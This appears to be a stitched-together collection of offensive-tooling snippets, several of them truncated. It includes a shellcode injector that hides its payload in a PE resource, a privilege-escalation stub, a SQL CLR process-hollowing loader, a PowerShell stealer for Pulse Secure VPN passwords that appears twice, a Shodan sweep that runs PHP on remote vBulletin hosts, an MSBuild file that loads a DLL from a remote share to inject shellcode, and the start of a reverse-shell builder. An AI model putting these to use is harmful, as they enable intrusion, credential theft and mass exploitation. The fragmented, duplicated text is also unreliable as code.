#include <iostream> | |
#include <windows.h> | |
void* GetBaseAddressOfKernel32() { | |
void* kernel32BaseAddress = nullptr; | |
__asm { | |
mov rdi, 0xFFFFFFFFFFFFFFFF // Set RDI to -1 | |
inc rdi // Increment RDI to 0 | |
mov rax, 0 // Zero out RAX |
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Runtime.CompilerServices; | |
using System.Net; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
namespace Test | |
{ | |
// CCOB IS THE GOAT |
/* | |
* PEResourceInject (C# version for x64) by Wra7h | |
* | |
 * Embed the shellcode in the target executable as a bitmap resource, then parse the PE header to locate
 * that resource and compute the shellcode's address.
 * This avoids direct calls to VirtualAllocEx and WriteProcessMemory, but it modifies the target exe on
 * disk (which also invalidates any Authenticode signature on it); this implementation creates a backup
 * copy of the executable in the same directory with a ".bak" extension.
* | |
* Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs | |
* Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin> | |
* |
// TcbElevation - Authors: @splinter_code and @decoder_it | |
#define SECURITY_WIN32 | |
#include <windows.h> | |
#include <sspi.h> | |
#include <stdio.h> | |
#pragma comment(lib, "Secur32.lib") | |
void EnableTcbPrivilege(BOOL enforceCheck); |
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs | |
//SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\hollow.dll /function:BaconTime | |
using System; | |
using System.Data; | |
using System.Data.SqlClient; | |
using System.Data.SqlTypes; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
using Microsoft.SqlServer.Server; |
Add-Type -AssemblyName System.Security; | |
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*' | |
foreach($ive in $ives) { | |
$ivename = $ive.PSPath.split('\')[-1].ToUpper() | |
Write-Host "[+] Checking IVE $($ivename)..." | |
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename) | |
# 3 possible value names for password | |
$encrypted = $ive.Password1 | |
if(!$encrypted){ |
Add-Type -AssemblyName System.Security; | |
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*' | |
foreach($ive in $ives) { | |
$ivename = $ive.PSPath.split('\')[-1].ToUpper() | |
Write-Host "[+] Checking IVE $($ivename)..." | |
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename) | |
# 3 possible value names for password | |
$encrypted = $ive.Password1 | |
if(!$encrypted){ |
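#!/usr/bin/env bash
# Sweep Shodan results (favicon hash -601665621) and probe each ip:port for the
# widget_php template-injection check: the POST body asks the
# ajax/render/widget_tabbedcontainer_tab_panel endpoint to evaluate phpinfo(),
# and a "phpinfo" string in the response is treated as vulnerable.
# A hit means PHP was executed on the remote host - run this only against
# systems you are authorised to test.
#
# Fixes relative to the original one-liner:
#   * `while read host do` read a second variable named "do"; now `read -r host`.
#   * curl had no timeout, so one hung host stalled the whole sweep (--max-time).
#   * the ANSI colour was never reset, leaking into following terminal output.
#   * $host was used as a printf format string; it is now passed as an argument.
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " \
  | awk '{print $1":"$2}' \
  | while read -r host; do
      if curl -s --max-time 10 "http://$host/ajax/render/widget_tabbedcontainer_tab_panel" \
           -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' \
         | grep -q phpinfo; then
        printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
      else
        printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"
      fi
    done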
<!-- MSBuild project whose only target runs a custom task, SimpleTask, that is
     loaded from a remote SMB share (see UsingTask below). Building this file
     with msbuild.exe therefore fetches IEShims.dll from \\192.168.120.129\share
     and executes it inside the msbuild.exe process; the build host must be able
     to reach that share, and the SMB connection authenticates to it. -->
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- The only target in the project, so it is what MSBuild builds when no
       target is named on the command line. -->
  <Target Name="MyTarget">
    <!-- Task parameters. MyCode is a placeholder for base64-encoded x64
         shellcode and MyProcess names the Internet Explorer binary; the task's
         source is not shown here, so what it does with them (presumably
         running the code in that process) should be confirmed against the DLL. -->
    <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
                MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
  </Target>
  <!-- Task assembly resolved from a UNC path rather than a local file. -->
  <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>
#!/bin/bash | |
# This is not great... | |
# | |
NAME=Shell | |
TAC=TrustAllCertificates | |
LHOST=10.0.0.254 | |
LPORT=4444 | |
COMMAND='"powershell"' | |
CURDIR=$(pwd) |